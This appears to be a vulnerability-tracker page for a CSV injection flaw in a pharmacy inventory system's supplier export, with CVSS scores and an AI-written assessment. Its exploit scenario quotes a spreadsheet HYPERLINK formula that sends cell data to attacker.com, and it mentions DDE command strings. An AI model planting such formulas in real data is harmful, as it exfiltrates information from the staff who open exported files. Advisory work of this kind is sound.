EUVD-2026-33623
GHSA-hpq4-4cqf-mcg8
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.
AnalysisAI
CSV injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows high-privileged remote attackers to embed malicious spreadsheet formula payloads via the Address and Company Name fields in the Supplier Creation Interface, which are then written unsanitized to exported CSV files. When downstream staff open the exported file in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the injected formulas execute in that client application's context, enabling information disclosure, data manipulation, or further client-side exploitation. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a high-privilege account (PR:H per CVSS vector) on the SourceCodester Pharmacy Sales and Inventory System - the attacker cannot exploit this unauthenticated or with low-privilege credentials. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS base score of 4.7 (Medium) is consistent with the actual risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A high-privileged attacker with valid application credentials navigates to the Supplier Creation Interface and creates or edits a supplier record, injecting a payload such as '=HYPERLINK("http://attacker.com/?data="&A1,"Click")' or a DDE command string into the Company Name or Address field. A staff member later exports the supplier list via the /Export_csv/export endpoint and opens the resulting file in Microsoft Excel, which interprets the injected formula and either exfiltrates local data to an attacker-controlled server or prompts execution of a system command. … |
| Remediation | No vendor-released patch has been identified at time of analysis - the remediation level in the CVSS temporal vector is listed as Unknown (RL:X), and no patched version is referenced in any available advisory. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today